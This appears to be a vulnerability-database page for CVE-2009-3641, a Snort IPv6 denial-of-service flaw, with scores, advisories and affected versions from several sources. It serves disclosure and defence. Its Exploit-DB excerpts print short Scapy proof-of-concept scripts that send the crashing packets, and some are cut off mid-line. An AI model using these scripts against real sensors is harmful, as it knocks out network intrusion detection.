CVE-2009-3641
published 2009-10-28CVE-2009-3641: Snort before 2.8.5.1, when the -v option is enabled, allows remote attackers to cause a denial of service (application crash) via a crafted IPv6 packet that…
PriorityP431medium4.3CVSS 2.0
AVNACMAuNCNINAP
EXPLOIT
EPSS
38.78%
98.4th percentile
Snort before 2.8.5.1, when the -v option is enabled, allows remote attackers to cause a denial of service (application crash) via a crafted IPv6 packet that uses the (1) TCP or (2) ICMP protocol.
Affected
26 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| snort | snort | <= 2.8.3.5 | — |
| snort | snort | — | — |
| snort | snort | — | — |
| snort | snort | — | — |
| snort | snort | — | — |
| snort | snort | — | — |
| snort | snort | — | — |
| snort | snort | — | — |
| snort | snort | — | — |
| snort | snort | — | — |
| snort | snort | — | — |
| snort | snort | — | — |
| snort | snort | — | — |
| snort | snort | — | — |
| snort | snort | — | — |
| snort | snort | — | — |
| snort | snort | — | — |
| snort | snort | — | — |
| snort | snort | — | — |
| snort | snort | — | — |
| snort | snort | — | — |
| snort | snort | — | — |
| snort | snort | — | — |
| snort | snort | — | — |
| snort | snort | — | — |
CVSS provenance
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:N/A:P
osv4.3MEDIUM
vendor_redhat4.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-56x5-r874-457f: Snort before 2
ghsa_unreviewed·2022-05-02
CVE-2009-3641 [MEDIUM] GHSA-56x5-r874-457f: Snort before 2
Snort before 2.8.5.1, when the -v option is enabled, allows remote attackers to cause a denial of service (application crash) via a crafted IPv6 packet that uses the (1) TCP or (2) ICMP protocol.
OSV
CVE-2009-3641: Snort before 2
osv·2009-10-28·CVSS 4.3
CVE-2009-3641 [MEDIUM] CVE-2009-3641: Snort before 2
Snort before 2.8.5.1, when the -v option is enabled, allows remote attackers to cause a denial of service (application crash) via a crafted IPv6 packet that uses the (1) TCP or (2) ICMP protocol.
Red Hat
Snort: DoS (crash) while printing specially-crafted IPv6 packet using the -v option
vendor_redhat·2009-10-22·CVSS 4.3
CVE-2009-3641 [MEDIUM] Snort: DoS (crash) while printing specially-crafted IPv6 packet using the -v option
Snort: DoS (crash) while printing specially-crafted IPv6 packet using the -v option
Snort before 2.8.5.1, when the -v option is enabled, allows remote attackers to cause a denial of service (application crash) via a crafted IPv6 packet that uses the (1) TCP or (2) ICMP protocol.
No detection rules found.
Exploit-DB
Snort 2.8.5 - IPv6 Denial of Service
exploitdb·2009-10-23
CVE-2009-3641 Snort 2.8.5 - IPv6 Denial of Service
Snort 2.8.5 - IPv6 Denial of Service
---
- Date: October 22th, 2009
- Discovered by: Laurent Gaffi�
- Severity: Low
I. VULNERABILITY
Snort TCP
2) # works x86,x64
#/usr/bin/env python
from scapy.all import *
z = "Q" * 30
send(IPv6(dst="IPv6_ADDR_HERE",nh=1)/ICMPv6NIQueryNOOP(type=4)/z) #nh1 ->
icmp (not v6)
IV. SYSTEMS AFFECTED
Theses proof of concept as been tested on snort:
- 2.8.5
V. NOT AFFECTED
Sourcefire 3D Sensor
VI. SOLUTION
A new version correcting theses issues as been released (2.8.5.1) :
http://www.snort.org/downloads
VII. REFERENCES
http://www.snort.org/
http://vrt-sourcefire.blogspot.com/
VIII. REVISION HISTORY
October 14th, 2009: First issue discovered, advisory send to snort team.
October 14th, 2009: Snort security team confirm the bug.
October 16th, 2009: Sec
Exploit-DB
Snort 2.8.5 - Multiple Denial of Service Vulnerabilities
exploitdb·2009-10-22
CVE-2009-3641 Snort 2.8.5 - Multiple Denial of Service Vulnerabilities
Snort 2.8.5 - Multiple Denial of Service Vulnerabilities
---
source: https://www.securityfocus.com/bid/36795/info
Snort is prone to multiple denial-of-service vulnerabilities because the application fails to properly process specially crafted IPv6 packets.
Attackers can exploit these issues to crash the affected application, causing denial-of-service conditions.
These issues affect Snort 2.8.5; other versions may also be vulnerable.
You can reproduce theses two differents bugs easily by using the Python low-level networking lib Scapy
(http://www.secdev.org/projects/scapy/files/scapy-latest.zip)
1) #only works on x86
#/usr/bin/env python
from scapy.all import *
u = "\x92"+"\x02" * 6
send(IPv6(dst="IPv6_addr_here", nh=6)/u) #nh6 -> TCP
2) # works x86,x64
#/usr/bin/env python
from s
http://dl.snort.org/snort-current/release_notes_2851.txthttp://marc.info/?l=oss-security&m=125649553414700&w=2http://seclists.org/fulldisclosure/2009/Oct/299http://secunia.com/advisories/37135http://securitytracker.com/id?1023076http://vrt-sourcefire.blogspot.com/2009/10/snort-2851-release.htmlhttp://www.openwall.com/lists/oss-security/2009/10/25/5http://www.osvdb.org/59159http://www.securityfocus.com/bid/36795http://www.vupen.com/english/advisories/2009/3014https://bugzilla.redhat.com/show_bug.cgi?id=530863https://exchange.xforce.ibmcloud.com/vulnerabilities/53912http://dl.snort.org/snort-current/release_notes_2851.txthttp://marc.info/?l=oss-security&m=125649553414700&w=2http://seclists.org/fulldisclosure/2009/Oct/299http://secunia.com/advisories/37135http://securitytracker.com/id?1023076http://vrt-sourcefire.blogspot.com/2009/10/snort-2851-release.htmlhttp://www.openwall.com/lists/oss-security/2009/10/25/5http://www.osvdb.org/59159http://www.securityfocus.com/bid/36795http://www.vupen.com/english/advisories/2009/3014https://bugzilla.redhat.com/show_bug.cgi?id=530863https://exchange.xforce.ibmcloud.com/vulnerabilities/53912
2009-10-28
Published